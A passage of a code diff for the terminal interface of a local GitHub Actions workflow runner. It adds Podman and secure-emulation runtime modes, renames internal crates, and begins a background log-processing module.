RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
};
|
||||
|
||||
App {
|
||||
@@ -145,6 +210,13 @@ impl App {
|
||||
log_filter_level: Some(LogFilterLevel::All),
|
||||
log_search_matches: Vec::new(),
|
||||
log_search_match_idx: 0,
|
||||
help_scroll: 0,
|
||||
|
||||
// Background log processing
|
||||
log_processor: LogProcessor::new(),
|
||||
processed_logs: Vec::new(),
|
||||
logs_need_update: true,
|
||||
last_system_logs_count: 0,
|
||||
}
|
||||
}
|
||||
|
||||
@@ -159,7 +231,9 @@ impl App {
|
||||
|
||||
pub fn toggle_emulation_mode(&mut self) {
|
||||
self.runtime_type = match self.runtime_type {
|
||||
RuntimeType::Docker => RuntimeType::Emulation,
|
||||
RuntimeType::Docker => RuntimeType::Podman,
|
||||
RuntimeType::Podman => RuntimeType::SecureEmulation,
|
||||
RuntimeType::SecureEmulation => RuntimeType::Emulation,
|
||||
RuntimeType::Emulation => RuntimeType::Docker,
|
||||
};
|
||||
self.logs
|
||||
@@ -176,13 +250,15 @@ impl App {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs
|
||||
.push(format!("[{}] Switched to {} mode", timestamp, mode));
|
||||
logging::info(&format!("Switched to {} mode", mode));
|
||||
wrkflw_logging::info(&format!("Switched to {} mode", mode));
|
||||
}
|
||||
|
||||
pub fn runtime_type_name(&self) -> &str {
|
||||
match self.runtime_type {
|
||||
RuntimeType::Docker => "Docker",
|
||||
RuntimeType::Emulation => "Emulation",
|
||||
RuntimeType::Podman => "Podman",
|
||||
RuntimeType::SecureEmulation => "Secure Emulation",
|
||||
RuntimeType::Emulation => "Emulation (Unsafe)",
|
||||
}
|
||||
}
|
||||
|
||||
@@ -373,10 +449,9 @@ impl App {
|
||||
if let Some(idx) = self.workflow_list_state.selected() {
|
||||
if idx < self.workflows.len() && !self.execution_queue.contains(&idx) {
|
||||
self.execution_queue.push(idx);
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs.push(format!(
|
||||
"[{}] Added '{}' to execution queue. Press 'Enter' to start.",
|
||||
timestamp, self.workflows[idx].name
|
||||
self.add_timestamped_log(&format!(
|
||||
"Added '{}' to execution queue. Press 'Enter' to start.",
|
||||
self.workflows[idx].name
|
||||
));
|
||||
}
|
||||
}
|
||||
@@ -393,7 +468,7 @@ impl App {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs
|
||||
.push(format!("[{}] Starting workflow execution...", timestamp));
|
||||
logging::info("Starting workflow execution...");
|
||||
wrkflw_logging::info("Starting workflow execution...");
|
||||
}
|
||||
}
|
||||
|
||||
@@ -401,7 +476,7 @@ impl App {
|
||||
pub fn process_execution_result(
|
||||
&mut self,
|
||||
workflow_idx: usize,
|
||||
result: Result<(Vec<executor::JobResult>, ()), String>,
|
||||
result: Result<(Vec<wrkflw_executor::JobResult>, ()), String>,
|
||||
) {
|
||||
if workflow_idx >= self.workflows.len() {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
@@ -409,7 +484,7 @@ impl App {
|
||||
"[{}] Error: Invalid workflow index received",
|
||||
timestamp
|
||||
));
|
||||
logging::error("Invalid workflow index received in process_execution_result");
|
||||
wrkflw_logging::error("Invalid workflow index received in process_execution_result");
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -438,15 +513,15 @@ impl App {
|
||||
.push(format!("[{}] Operation completed successfully.", timestamp));
|
||||
execution_details.progress = 1.0;
|
||||
|
||||
// Convert executor::JobResult to our JobExecution struct
|
||||
// Convert wrkflw_executor::JobResult to our JobExecution struct
|
||||
execution_details.jobs = jobs
|
||||
.iter()
|
||||
.map(|job_result| JobExecution {
|
||||
name: job_result.name.clone(),
|
||||
status: match job_result.status {
|
||||
executor::JobStatus::Success => JobStatus::Success,
|
||||
executor::JobStatus::Failure => JobStatus::Failure,
|
||||
executor::JobStatus::Skipped => JobStatus::Skipped,
|
||||
wrkflw_executor::JobStatus::Success => JobStatus::Success,
|
||||
wrkflw_executor::JobStatus::Failure => JobStatus::Failure,
|
||||
wrkflw_executor::JobStatus::Skipped => JobStatus::Skipped,
|
||||
},
|
||||
steps: job_result
|
||||
.steps
|
||||
@@ -454,9 +529,9 @@ impl App {
|
||||
.map(|step_result| StepExecution {
|
||||
name: step_result.name.clone(),
|
||||
status: match step_result.status {
|
||||
executor::StepStatus::Success => StepStatus::Success,
|
||||
executor::StepStatus::Failure => StepStatus::Failure,
|
||||
executor::StepStatus::Skipped => StepStatus::Skipped,
|
||||
wrkflw_executor::StepStatus::Success => StepStatus::Success,
|
||||
wrkflw_executor::StepStatus::Failure => StepStatus::Failure,
|
||||
wrkflw_executor::StepStatus::Skipped => StepStatus::Skipped,
|
||||
},
|
||||
output: step_result.output.clone(),
|
||||
})
|
||||
@@ -495,7 +570,7 @@ impl App {
|
||||
"[{}] Workflow '{}' completed successfully!",
|
||||
timestamp, workflow.name
|
||||
));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"[{}] Workflow '{}' completed successfully!",
|
||||
timestamp, workflow.name
|
||||
));
|
||||
@@ -507,7 +582,7 @@ impl App {
|
||||
"[{}] Workflow '{}' failed: {}",
|
||||
timestamp, workflow.name, e
|
||||
));
|
||||
logging::error(&format!(
|
||||
wrkflw_logging::error(&format!(
|
||||
"[{}] Workflow '{}' failed: {}",
|
||||
timestamp, workflow.name, e
|
||||
));
|
||||
@@ -533,7 +608,7 @@ impl App {
|
||||
self.current_execution = Some(next);
|
||||
self.logs
|
||||
.push(format!("Executing workflow: {}", self.workflows[next].name));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Executing workflow: {}",
|
||||
self.workflows[next].name
|
||||
));
|
||||
@@ -579,10 +654,11 @@ impl App {
|
||||
self.log_search_active = false;
|
||||
self.log_search_query.clear();
|
||||
self.log_search_matches.clear();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
KeyCode::Backspace => {
|
||||
self.log_search_query.pop();
|
||||
self.update_log_search_matches();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
KeyCode::Enter => {
|
||||
self.log_search_active = false;
|
||||
@@ -590,7 +666,7 @@ impl App {
|
||||
}
|
||||
KeyCode::Char(c) => {
|
||||
self.log_search_query.push(c);
|
||||
self.update_log_search_matches();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
@@ -602,8 +678,8 @@ impl App {
|
||||
if !self.log_search_active {
|
||||
// Don't clear the query, this allows toggling the search UI while keeping the filter
|
||||
} else {
|
||||
// When activating search, update matches
|
||||
self.update_log_search_matches();
|
||||
// When activating search, trigger update
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
}
|
||||
|
||||
@@ -614,8 +690,8 @@ impl App {
|
||||
Some(level) => Some(level.next()),
|
||||
};
|
||||
|
||||
// Update search matches when filter changes
|
||||
self.update_log_search_matches();
|
||||
// Trigger log processing update when filter changes
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
// Clear log search and filter
|
||||
@@ -624,6 +700,7 @@ impl App {
|
||||
self.log_filter_level = None;
|
||||
self.log_search_matches.clear();
|
||||
self.log_search_match_idx = 0;
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
// Update matches based on current search and filter
|
||||
@@ -636,7 +713,7 @@ impl App {
|
||||
for log in &self.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
for log in logging::get_logs() {
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
@@ -728,12 +805,24 @@ impl App {
|
||||
// Scroll logs down
|
||||
pub fn scroll_logs_down(&mut self) {
|
||||
// Get total log count including system logs
|
||||
let total_logs = self.logs.len() + logging::get_logs().len();
|
||||
let total_logs = self.logs.len() + wrkflw_logging::get_logs().len();
|
||||
if total_logs > 0 {
|
||||
self.log_scroll = (self.log_scroll + 1).min(total_logs - 1);
|
||||
}
|
||||
}
|
||||
|
||||
// Scroll help content up
|
||||
pub fn scroll_help_up(&mut self) {
|
||||
self.help_scroll = self.help_scroll.saturating_sub(1);
|
||||
}
|
||||
|
||||
// Scroll help content down
|
||||
pub fn scroll_help_down(&mut self) {
|
||||
// The help content has a fixed number of lines, so we set a reasonable max
|
||||
const MAX_HELP_SCROLL: usize = 30; // Adjust based on help content length
|
||||
self.help_scroll = (self.help_scroll + 1).min(MAX_HELP_SCROLL);
|
||||
}
|
||||
|
||||
// Update progress for running workflows
|
||||
pub fn update_running_workflow_progress(&mut self) {
|
||||
if let Some(idx) = self.current_execution {
|
||||
@@ -782,7 +871,9 @@ impl App {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs
|
||||
.push(format!("[{}] Error: Invalid workflow selection", timestamp));
|
||||
logging::error("Invalid workflow selection in trigger_selected_workflow");
|
||||
wrkflw_logging::error(
|
||||
"Invalid workflow selection in trigger_selected_workflow",
|
||||
);
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -792,7 +883,7 @@ impl App {
|
||||
"[{}] Triggering workflow: {}",
|
||||
timestamp, workflow.name
|
||||
));
|
||||
logging::info(&format!("Triggering workflow: {}", workflow.name));
|
||||
wrkflw_logging::info(&format!("Triggering workflow: {}", workflow.name));
|
||||
|
||||
// Clone necessary values for the async task
|
||||
let workflow_name = workflow.name.clone();
|
||||
@@ -825,19 +916,19 @@ impl App {
|
||||
|
||||
// Send the result back to the main thread
|
||||
if let Err(e) = tx_clone.send((selected_idx, result)) {
|
||||
logging::error(&format!("Error sending trigger result: {}", e));
|
||||
wrkflw_logging::error(&format!("Error sending trigger result: {}", e));
|
||||
}
|
||||
});
|
||||
} else {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs
|
||||
.push(format!("[{}] No workflow selected to trigger", timestamp));
|
||||
logging::warning("No workflow selected to trigger");
|
||||
wrkflw_logging::warning("No workflow selected to trigger");
|
||||
}
|
||||
} else {
|
||||
self.logs
|
||||
.push("No workflow selected to trigger".to_string());
|
||||
logging::warning("No workflow selected to trigger");
|
||||
wrkflw_logging::warning("No workflow selected to trigger");
|
||||
}
|
||||
}
|
||||
|
||||
@@ -850,7 +941,7 @@ impl App {
|
||||
"[{}] Debug: No workflow selected for reset",
|
||||
timestamp
|
||||
));
|
||||
logging::warning("No workflow selected for reset");
|
||||
wrkflw_logging::warning("No workflow selected for reset");
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -887,7 +978,7 @@ impl App {
|
||||
"[{}] Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
|
||||
timestamp, workflow.name, old_status, workflow.status
|
||||
));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
|
||||
workflow.name, old_status, workflow.status
|
||||
));
|
||||
@@ -897,4 +988,82 @@ impl App {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Request log processing update from background thread
|
||||
pub fn request_log_processing_update(&mut self) {
|
||||
let request = LogProcessingRequest {
|
||||
search_query: self.log_search_query.clone(),
|
||||
filter_level: self.log_filter_level.clone(),
|
||||
app_logs: self.logs.clone(),
|
||||
app_logs_count: self.logs.len(),
|
||||
system_logs_count: wrkflw_logging::get_logs().len(),
|
||||
};
|
||||
|
||||
if self.log_processor.request_update(request).is_err() {
|
||||
// Log processor channel disconnected, recreate it
|
||||
self.log_processor = LogProcessor::new();
|
||||
self.logs_need_update = true;
|
||||
}
|
||||
}
|
||||
|
||||
/// Check for and apply log processing updates
|
||||
pub fn check_log_processing_updates(&mut self) {
|
||||
// Check if system logs have changed
|
||||
let current_system_logs_count = wrkflw_logging::get_logs().len();
|
||||
if current_system_logs_count != self.last_system_logs_count {
|
||||
self.last_system_logs_count = current_system_logs_count;
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
if let Some(response) = self.log_processor.try_get_update() {
|
||||
self.processed_logs = response.processed_logs;
|
||||
self.log_search_matches = response.search_matches;
|
||||
|
||||
// Update scroll position to first match if we have search results
|
||||
if !self.log_search_matches.is_empty() && !self.log_search_query.is_empty() {
|
||||
self.log_search_match_idx = 0;
|
||||
if let Some(&idx) = self.log_search_matches.first() {
|
||||
self.log_scroll = idx;
|
||||
}
|
||||
}
|
||||
|
||||
self.logs_need_update = false;
|
||||
}
|
||||
}
|
||||
|
||||
/// Trigger log processing when search/filter changes
|
||||
pub fn mark_logs_for_update(&mut self) {
|
||||
self.logs_need_update = true;
|
||||
self.request_log_processing_update();
|
||||
}
|
||||
|
||||
/// Get combined app and system logs for background processing
|
||||
pub fn get_combined_logs(&self) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in &self.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Add a log entry and trigger log processing update
|
||||
pub fn add_log(&mut self, message: String) {
|
||||
self.logs.push(message);
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
/// Add a formatted log entry with timestamp and trigger log processing update
|
||||
pub fn add_timestamped_log(&mut self, message: &str) {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
let formatted_message = format!("[{}] {}", timestamp, message);
|
||||
self.add_log(formatted_message);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -2,12 +2,12 @@
|
||||
use crate::app::App;
|
||||
use crate::models::{ExecutionResultMsg, WorkflowExecution, WorkflowStatus};
|
||||
use chrono::Local;
|
||||
use evaluator::evaluate_workflow_file;
|
||||
use executor::{self, JobStatus, RuntimeType, StepStatus};
|
||||
use std::io;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use wrkflw_evaluator::evaluate_workflow_file;
|
||||
use wrkflw_executor::{self, JobStatus, RuntimeType, StepStatus};
|
||||
|
||||
// Validate a workflow or directory containing workflows
|
||||
pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
|
||||
@@ -20,7 +20,7 @@ pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
|
||||
let entry = entry?;
|
||||
let entry_path = entry.path();
|
||||
|
||||
if entry_path.is_file() && utils::is_workflow_file(&entry_path) {
|
||||
if entry_path.is_file() && wrkflw_utils::is_workflow_file(&entry_path) {
|
||||
workflows.push(entry_path);
|
||||
}
|
||||
}
|
||||
@@ -102,17 +102,27 @@ pub async fn execute_workflow_cli(
|
||||
}
|
||||
}
|
||||
|
||||
// Check Docker availability if Docker runtime is selected
|
||||
// Check container runtime availability if container runtime is selected
|
||||
let runtime_type = match runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
if !executor::docker::is_available() {
|
||||
if !wrkflw_executor::docker::is_available() {
|
||||
println!("⚠️ Docker is not available. Using emulation mode instead.");
|
||||
logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
if !wrkflw_executor::podman::is_available() {
|
||||
println!("⚠️ Podman is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
@@ -120,20 +130,21 @@ pub async fn execute_workflow_cli(
|
||||
println!("Runtime mode: {:?}", runtime_type);
|
||||
|
||||
// Log the start of the execution in debug mode with more details
|
||||
logging::debug(&format!(
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Starting workflow execution: path={}, runtime={:?}, verbose={}",
|
||||
path.display(),
|
||||
runtime_type,
|
||||
verbose
|
||||
));
|
||||
|
||||
let config = executor::ExecutionConfig {
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type,
|
||||
verbose,
|
||||
preserve_containers_on_failure: false, // Default for this path
|
||||
secrets_config: None, // Use default secrets configuration
|
||||
};
|
||||
|
||||
match executor::execute_workflow(path, config).await {
|
||||
match wrkflw_executor::execute_workflow(path, config).await {
|
||||
Ok(result) => {
|
||||
println!("\nWorkflow execution results:");
|
||||
|
||||
@@ -157,7 +168,7 @@ pub async fn execute_workflow_cli(
|
||||
println!("-------------------------");
|
||||
|
||||
// Log the job details for debug purposes
|
||||
logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
|
||||
wrkflw_logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
|
||||
|
||||
for step in job.steps.iter() {
|
||||
match step.status {
|
||||
@@ -193,7 +204,7 @@ pub async fn execute_workflow_cli(
|
||||
}
|
||||
|
||||
// Show command/run details in debug mode
|
||||
if logging::get_log_level() <= logging::LogLevel::Debug {
|
||||
if wrkflw_logging::get_log_level() <= wrkflw_logging::LogLevel::Debug {
|
||||
if let Some(cmd_output) = step
|
||||
.output
|
||||
.lines()
|
||||
@@ -233,7 +244,7 @@ pub async fn execute_workflow_cli(
|
||||
}
|
||||
|
||||
// Always log the step details for debug purposes
|
||||
logging::debug(&format!(
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Step: {}, Status: {:?}, Output length: {} lines",
|
||||
step.name,
|
||||
step.status,
|
||||
@@ -241,10 +252,10 @@ pub async fn execute_workflow_cli(
|
||||
));
|
||||
|
||||
// In debug mode, log all step output
|
||||
if logging::get_log_level() == logging::LogLevel::Debug
|
||||
if wrkflw_logging::get_log_level() == wrkflw_logging::LogLevel::Debug
|
||||
&& !step.output.trim().is_empty()
|
||||
{
|
||||
logging::debug(&format!(
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Step output for '{}': \n{}",
|
||||
step.name, step.output
|
||||
));
|
||||
@@ -256,7 +267,7 @@ pub async fn execute_workflow_cli(
|
||||
println!("\n❌ Workflow completed with failures");
|
||||
// In the case of failure, we'll also inform the user about the debug option
|
||||
// if they're not already using it
|
||||
if logging::get_log_level() > logging::LogLevel::Debug {
|
||||
if wrkflw_logging::get_log_level() > wrkflw_logging::LogLevel::Debug {
|
||||
println!(" Run with --debug for more detailed output");
|
||||
}
|
||||
} else {
|
||||
@@ -267,7 +278,7 @@ pub async fn execute_workflow_cli(
|
||||
}
|
||||
Err(e) => {
|
||||
println!("❌ Failed to execute workflow: {}", e);
|
||||
logging::error(&format!("Failed to execute workflow: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to execute workflow: {}", e));
|
||||
Err(io::Error::other(e))
|
||||
}
|
||||
}
|
||||
@@ -277,7 +288,7 @@ pub async fn execute_workflow_cli(
|
||||
pub async fn execute_curl_trigger(
|
||||
workflow_name: &str,
|
||||
branch: Option<&str>,
|
||||
) -> Result<(Vec<executor::JobResult>, ()), String> {
|
||||
) -> Result<(Vec<wrkflw_executor::JobResult>, ()), String> {
|
||||
// Get GitHub token
|
||||
let token = std::env::var("GITHUB_TOKEN").map_err(|_| {
|
||||
"GitHub token not found. Please set GITHUB_TOKEN environment variable".to_string()
|
||||
@@ -285,13 +296,13 @@ pub async fn execute_curl_trigger(
|
||||
|
||||
// Debug log to check if GITHUB_TOKEN is set
|
||||
match std::env::var("GITHUB_TOKEN") {
|
||||
Ok(token) => logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
|
||||
Err(_) => logging::error("GITHUB_TOKEN is not set"),
|
||||
Ok(token) => wrkflw_logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
|
||||
Err(_) => wrkflw_logging::error("GITHUB_TOKEN is not set"),
|
||||
}
|
||||
|
||||
// Get repository information
|
||||
let repo_info =
|
||||
github::get_repo_info().map_err(|e| format!("Failed to get repository info: {}", e))?;
|
||||
let repo_info = wrkflw_github::get_repo_info()
|
||||
.map_err(|e| format!("Failed to get repository info: {}", e))?;
|
||||
|
||||
// Determine branch to use
|
||||
let branch_ref = branch.unwrap_or(&repo_info.default_branch);
|
||||
@@ -306,7 +317,7 @@ pub async fn execute_curl_trigger(
|
||||
workflow_name
|
||||
};
|
||||
|
||||
logging::info(&format!("Using workflow name: {}", workflow_name));
|
||||
wrkflw_logging::info(&format!("Using workflow name: {}", workflow_name));
|
||||
|
||||
// Construct JSON payload
|
||||
let payload = serde_json::json!({
|
||||
@@ -319,7 +330,7 @@ pub async fn execute_curl_trigger(
|
||||
repo_info.owner, repo_info.repo, workflow_name
|
||||
);
|
||||
|
||||
logging::info(&format!("Triggering workflow at URL: {}", url));
|
||||
wrkflw_logging::info(&format!("Triggering workflow at URL: {}", url));
|
||||
|
||||
// Create a reqwest client
|
||||
let client = reqwest::Client::new();
|
||||
@@ -353,12 +364,12 @@ pub async fn execute_curl_trigger(
|
||||
);
|
||||
|
||||
// Create a job result structure
|
||||
let job_result = executor::JobResult {
|
||||
let job_result = wrkflw_executor::JobResult {
|
||||
name: "GitHub Trigger".to_string(),
|
||||
status: executor::JobStatus::Success,
|
||||
steps: vec![executor::StepResult {
|
||||
status: wrkflw_executor::JobStatus::Success,
|
||||
steps: vec![wrkflw_executor::StepResult {
|
||||
name: "Remote Trigger".to_string(),
|
||||
status: executor::StepStatus::Success,
|
||||
status: wrkflw_executor::StepStatus::Success,
|
||||
output: success_msg,
|
||||
}],
|
||||
logs: "Workflow triggered remotely on GitHub".to_string(),
|
||||
@@ -382,41 +393,70 @@ pub fn start_next_workflow_execution(
|
||||
if verbose {
|
||||
app.logs
|
||||
.push("Verbose mode: Step outputs will be displayed in full".to_string());
|
||||
logging::info("Verbose mode: Step outputs will be displayed in full");
|
||||
wrkflw_logging::info("Verbose mode: Step outputs will be displayed in full");
|
||||
} else {
|
||||
app.logs.push(
|
||||
"Standard mode: Only step status will be shown (use --verbose for full output)"
|
||||
.to_string(),
|
||||
);
|
||||
logging::info(
|
||||
wrkflw_logging::info(
|
||||
"Standard mode: Only step status will be shown (use --verbose for full output)",
|
||||
);
|
||||
}
|
||||
|
||||
// Check Docker availability again if Docker runtime is selected
|
||||
// Check container runtime availability again if container runtime is selected
|
||||
let runtime_type = match app.runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
// Use safe FD redirection to check Docker availability
|
||||
let is_docker_available =
|
||||
match utils::fd::with_stderr_to_null(executor::docker::is_available) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_docker_available {
|
||||
app.logs
|
||||
.push("Docker is not available. Using emulation mode instead.".to_string());
|
||||
logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning(
|
||||
"Docker is not available. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Use safe FD redirection to check Podman availability
|
||||
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_podman_available {
|
||||
app.logs
|
||||
.push("Podman is not available. Using emulation mode instead.".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Podman is not available. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
@@ -456,21 +496,21 @@ pub fn start_next_workflow_execution(
|
||||
Ok(validation_result) => {
|
||||
// Create execution result based on validation
|
||||
let status = if validation_result.is_valid {
|
||||
executor::JobStatus::Success
|
||||
wrkflw_executor::JobStatus::Success
|
||||
} else {
|
||||
executor::JobStatus::Failure
|
||||
wrkflw_executor::JobStatus::Failure
|
||||
};
|
||||
|
||||
// Create a synthetic job result for validation
|
||||
let jobs = vec![executor::JobResult {
|
||||
let jobs = vec![wrkflw_executor::JobResult {
|
||||
name: "Validation".to_string(),
|
||||
status,
|
||||
steps: vec![executor::StepResult {
|
||||
steps: vec![wrkflw_executor::StepResult {
|
||||
name: "Validator".to_string(),
|
||||
status: if validation_result.is_valid {
|
||||
executor::StepStatus::Success
|
||||
wrkflw_executor::StepStatus::Success
|
||||
} else {
|
||||
executor::StepStatus::Failure
|
||||
wrkflw_executor::StepStatus::Failure
|
||||
},
|
||||
output: validation_result.issues.join("\n"),
|
||||
}],
|
||||
@@ -490,15 +530,16 @@ pub fn start_next_workflow_execution(
|
||||
}
|
||||
} else {
|
||||
// Use safe FD redirection for execution
|
||||
let config = executor::ExecutionConfig {
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type,
|
||||
verbose,
|
||||
preserve_containers_on_failure,
|
||||
secrets_config: None, // Use default secrets configuration
|
||||
};
|
||||
|
||||
let execution_result = utils::fd::with_stderr_to_null(|| {
|
||||
let execution_result = wrkflw_utils::fd::with_stderr_to_null(|| {
|
||||
futures::executor::block_on(async {
|
||||
executor::execute_workflow(&workflow_path, config).await
|
||||
wrkflw_executor::execute_workflow(&workflow_path, config).await
|
||||
})
|
||||
})
|
||||
.map_err(|e| format!("Failed to redirect stderr during execution: {}", e))?;
|
||||
@@ -515,7 +556,7 @@ pub fn start_next_workflow_execution(
|
||||
|
||||
// Only send if we get a valid result
|
||||
if let Err(e) = tx_clone_inner.send((next_idx, result)) {
|
||||
logging::error(&format!("Error sending execution result: {}", e));
|
||||
wrkflw_logging::error(&format!("Error sending execution result: {}", e));
|
||||
}
|
||||
});
|
||||
} else {
|
||||
@@ -523,6 +564,6 @@ pub fn start_next_workflow_execution(
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs
|
||||
.push(format!("[{}] All workflows completed execution", timestamp));
|
||||
logging::info("All workflows completed execution");
|
||||
wrkflw_logging::info("All workflows completed execution");
|
||||
}
|
||||
}
|
||||
|
||||
@@ -12,6 +12,7 @@
|
||||
pub mod app;
|
||||
pub mod components;
|
||||
pub mod handlers;
|
||||
pub mod log_processor;
|
||||
pub mod models;
|
||||
pub mod utils;
|
||||
pub mod views;
|
||||
|
||||
305
crates/ui/src/log_processor.rs
Normal file
305
crates/ui/src/log_processor.rs
Normal file
@@ -0,0 +1,305 @@
|
||||
// Background log processor for asynchronous log filtering and formatting
|
||||
use crate::models::LogFilterLevel;
|
||||
use ratatui::{
|
||||
style::{Color, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Cell, Row},
|
||||
};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
/// Processed log entry ready for rendering
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ProcessedLogEntry {
|
||||
pub timestamp: String,
|
||||
pub log_type: String,
|
||||
pub log_style: Style,
|
||||
pub content_spans: Vec<Span<'static>>,
|
||||
}
|
||||
|
||||
impl ProcessedLogEntry {
|
||||
/// Convert to a table row for rendering
|
||||
pub fn to_row(&self) -> Row<'static> {
|
||||
Row::new(vec![
|
||||
Cell::from(self.timestamp.clone()),
|
||||
Cell::from(self.log_type.clone()).style(self.log_style),
|
||||
Cell::from(Line::from(self.content_spans.clone())),
|
||||
])
|
||||
}
|
||||
}
|
||||
|
||||
/// Request to update log processing parameters
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingRequest {
|
||||
pub search_query: String,
|
||||
pub filter_level: Option<LogFilterLevel>,
|
||||
pub app_logs: Vec<String>, // Complete app logs
|
||||
pub app_logs_count: usize, // To detect changes in app logs
|
||||
pub system_logs_count: usize, // To detect changes in system logs
|
||||
}
|
||||
|
||||
/// Response with processed logs
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingResponse {
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub total_log_count: usize,
|
||||
pub filtered_count: usize,
|
||||
pub search_matches: Vec<usize>, // Indices of logs that match search
|
||||
}
|
||||
|
||||
/// Background log processor
|
||||
pub struct LogProcessor {
|
||||
request_tx: mpsc::Sender<LogProcessingRequest>,
|
||||
response_rx: mpsc::Receiver<LogProcessingResponse>,
|
||||
_worker_handle: thread::JoinHandle<()>,
|
||||
}
|
||||
|
||||
impl LogProcessor {
|
||||
/// Create a new log processor with a background worker thread
|
||||
pub fn new() -> Self {
|
||||
let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
|
||||
let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();
|
||||
|
||||
let worker_handle = thread::spawn(move || {
|
||||
